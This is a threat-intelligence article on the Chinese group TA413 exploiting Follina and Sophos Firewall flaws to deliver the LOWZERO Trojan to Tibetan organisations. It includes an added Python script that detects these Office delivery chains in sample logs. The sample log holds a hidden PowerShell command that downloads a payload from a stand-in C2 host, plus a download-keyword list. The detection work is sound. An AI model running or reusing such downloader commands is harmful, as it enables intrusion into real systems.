How Chinese threat actors are using recently discovered zero-day flaws in Office and Sophos Firewall

The Chinese APT known as TA413 is exploiting a variety of flaws in Microsoft Office and Sophos Firewall, deploying a new Trojan named LOWZERO as part of an espionage campaign aimed at Tibetan organizations.

The majority of the targets were businesses connected to the exiled Tibetan administration, as well as organizations connected to the Tibetan community. The attackers leveraged the remote code execution flaws CVE-2022-1040 in Sophos Firewall and CVE-2022-30190 (often referred to as “Follina”) in Microsoft Office to carry out the attacks.

Because this group is known for relying on well-established and documented techniques, the technical team at Recorded Future finds it unusual that this APT has adopted new techniques and access vectors so quickly. Since at least 2020, TA413 (also known as LuckyCat) has used malware such as ExileRAT, Sepulcher, and the malicious Mozilla Firefox browser extension FriarFox to attack organizations and individuals connected to the Tibetan community.

This group’s use of the “Follina” vulnerability first came to light in June 2022, when the Proofpoint team reported it, although they were unable to determine the cyberattack’s goal. It is also known that the campaign included a spear-phishing effort in May 2022 that distributed a malicious RTF file, which downloaded the LOWZERO Trojan by abusing flaws in Microsoft Equation Editor. The RTF file was built with the Royal Road RTF tool, which has been linked to a significant number of China-linked cyberattacks.

Another phishing email targeting a Tibetan recipient was discovered in late May. It carried a Microsoft Word attachment that attempted to exploit the “Follina” vulnerability to launch a custom PowerShell command, which in turn downloaded the aforementioned Trojan from a remote server. Once the attacker identifies an infected system as a target of interest, LOWZERO can download further modules from the command and control (C2) server.
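The two Office-based delivery chains described above (an RTF abusing Equation Editor, and a Word document abusing “Follina” to run PowerShell through msdt.exe) both leave a recognizable process-creation footprint that a defender can alert on without any file hash. The following script is an added example, not code from the original article or from Recorded Future or Proofpoint. It runs three generic detection rules over constructed, Sysmon-style process-creation records (the `RecordId`, `Image`, `ParentImage` and `CommandLine` fields, the paths and the `example.invalid` hostnames are all made up for the example, and the exploit parameters are deliberately omitted): an Office application launching msdt.exe with an `ms-msdt:` URI, EQNEDT32.EXE spawning any child process (it normally spawns none), and a script host launched from that chain that contains a download command. The last record is a benign PowerShell download from Explorer, included to show that the rules key on the parent process rather than on the download command alone.

```python
"""Detection rules for Office-based delivery chains over constructed process-creation logs.

Added example; not the article's or any vendor's code. The log lines below are
constructed to resemble Sysmon Event ID 1 records and are not real telemetry.
"""
import json

# Office applications that should rarely spawn diagnostic tools or script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Processes that sit in the Follina chain (msdt.exe -> sdiagnhost.exe -> script host)
# or the Equation Editor chain (EQNEDT32.EXE -> dropped payload / cmd.exe).
SUSPICIOUS_PARENTS = OFFICE_PARENTS | {"msdt.exe", "sdiagnhost.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings that indicate the script host is being used to fetch a second stage.
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile", "net.webclient", "iwr ")

# Constructed sample log (JSON lines). Record 5 is a benign administrator download.
SAMPLE_LOG = r'''
{"RecordId": 1, "Image": "C:\\Windows\\explorer.exe", "ParentImage": "C:\\Windows\\System32\\userinit.exe", "CommandLine": "explorer.exe"}
{"RecordId": 2, "Image": "C:\\Windows\\System32\\msdt.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "\"C:\\Windows\\System32\\msdt.exe\" ms-msdt:/id PCWDiagnostic <parameters-omitted>"}
{"RecordId": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\sdiagnhost.exe", "CommandLine": "powershell.exe -w hidden -c Invoke-WebRequest http://c2.example.invalid/stage -OutFile $env:TEMP\\stage.exe"}
{"RecordId": 4, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "CommandLine": "cmd.exe /c %TEMP%\\dropped.exe"}
{"RecordId": 5, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -c Invoke-WebRequest https://updates.example.invalid/tool.zip -OutFile tool.zip"}
'''


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Apply the detection rules to one process-creation event; return the rule names that fired."""
    findings = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()

    # Rule 1: msdt.exe invoked with an ms-msdt: URI (the Follina trigger).
    if image == "msdt.exe" and "ms-msdt:" in cmd:
        findings.append("follina_msdt_uri")

    # Rule 2: Equation Editor spawning anything at all is abnormal.
    if parent == "eqnedt32.exe":
        findings.append("equation_editor_child_process")

    # Rule 3: a script host launched from an Office/diagnostic chain, optionally downloading.
    if parent in SUSPICIOUS_PARENTS and image in SCRIPT_HOSTS:
        findings.append("office_chain_script_host")
        if any(marker in cmd for marker in DOWNLOAD_MARKERS):
            findings.append("office_chain_downloader")

    return findings


def scan(log_text: str) -> dict[int, list[str]]:
    """Parse JSON-lines process events and return {RecordId: [rules fired]} for flagged events only."""
    flagged = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        findings = classify(event)
        if findings:
            flagged[event["RecordId"]] = findings
    return flagged


if __name__ == "__main__":
    for record_id, rules in scan(SAMPLE_LOG).items():
        print(f"record {record_id}: {', '.join(rules)}")
```

Records 2, 3 and 4 are flagged and record 5 is not; in production the same logic maps directly onto a SIEM query keyed on parent image and command line, with the `ms-msdt:` rule also serving as a check that the protocol-handler mitigation has actually been applied.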

TA413’s exploitation of newly disclosed and zero-day vulnerabilities fits a broader pattern among Chinese cyber espionage groups: exploits frequently appear in use by several different Chinese activity groups before they become widely available to the general public.